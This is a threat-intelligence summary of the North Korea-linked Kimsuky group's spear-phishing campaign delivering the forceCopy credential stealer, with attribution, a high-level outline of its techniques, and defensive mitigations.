Full Report
The North Korea-linked nation-state hacking group known as Kimsuky has been observed conducting spear-phishing attacks to deliver an information stealer malware named forceCopy, according to new findings from the AhnLab Security Intelligence Center (ASEC). The attacks commence with phishing emails containing a Windows shortcut (LNK) file that's disguised as a Microsoft Office or PDF document.
Analysis Summary
# Threat Actor: Kimsuky (APT43)
## Attribution & Identity
**Attribution:** North Korea-linked nation-state hacking group.
**Aliases and Associations:** APT43, Black Banshee, Emerald Sleet, Sparkling Pisces, Springtail, TA427, and Velvet Chollima. Assessed to be affiliated with the Reconnaissance General Bureau (RGB), North Korea's primary foreign intelligence service.
**Historical Activities:** Active since at least 2012, known for orchestrating tailored social engineering attacks capable of bypassing email security protections.
## Activity Summary
Kimsuky is currently observed conducting spear-phishing attacks to deliver their information stealer malware, **forceCopy**. These attacks initiate via phishing emails containing a Windows shortcut (LNK) file disguised as a Microsoft Office or PDF document. Successful execution leads to the download and deployment of next-stage payloads, including the PEBBLEDASH trojan, a custom RDP Wrapper utility, and a proxy malware for persistent C2 communication. A key focus of this recent activity is the use of forceCopy to steal browser-stored credentials.
## Tactics, Techniques & Procedures
- **Initial Access:** Spear-phishing via email containing LNK files disguised as documents (Office/PDF).
- **Execution:** Execution chain involves PowerShell or `mshta.exe` to download and run external payloads.
- **Credential Access/Collection:** Deployment of a PowerShell-based keylogger; use of the *forceCopy* malware specifically targets and copies files from web browser installation paths to steal stored credentials/configuration files.
- **Command and Control (C2):** Utilization of RDP Wrapper and proxy malware to establish persistent communications outside the network, indicating a tactical shift from using bespoke backdoors.
- **Persistence/Lateral Movement:** Likely utilizing RDP Wrapper for remote access capability.
## Targeting
**Sectors:** Not explicitly detailed, but the objective (stealing browser credentials) suggests targeting for espionage or data exfiltration related to sensitive organizational information accessible via user accounts.
**Geography:** Not explicitly detailed in the provided text.
**Victims:** Not specifically named, but the attacks target users whose browser configuration files contain sensitive credentials.
## Tools & Infrastructure
**Malware families used:**
- **forceCopy:** New information stealer malware focused on browser credential files.
- **PEBBLEDASH:** Known trojan reportedly deployed in later stages.
- **PowerShell-based keylogger.**
**Infrastructure (C2, domains, IPs):**
- External source used for downloading next-stage payloads.
- Use of **RDP Wrapper** and proxy malware facilitating communication via an external network. (Specific URLs/IPs were not provided/defanged in the source text).
## Implications
Kimsuky is demonstrating an evolution in their operation by leveraging readily available remote access tools (RDP Wrapper) and proxies for C2, moving away from older bespoke backdoors. The specific targeting of web browser credential files underscores a clear objective of harvesting stored session data and login information from compromised endpoints.
## Mitigations
- Enhance scrutiny and filtering of emails containing LNK files, especially those disguised as common document types.
- Implement application control solutions to restrict the execution of inline scripting languages like PowerShell or binaries like `mshta.exe` for unauthorized purposes.
- Harden configurations for web browsers to minimize storage of sensitive credentials, or implement credential management solutions that rely on hardware-based security.
- Continuously monitor for unusual outbound RDP traffic or the invocation of remote desktop utilities on endpoints.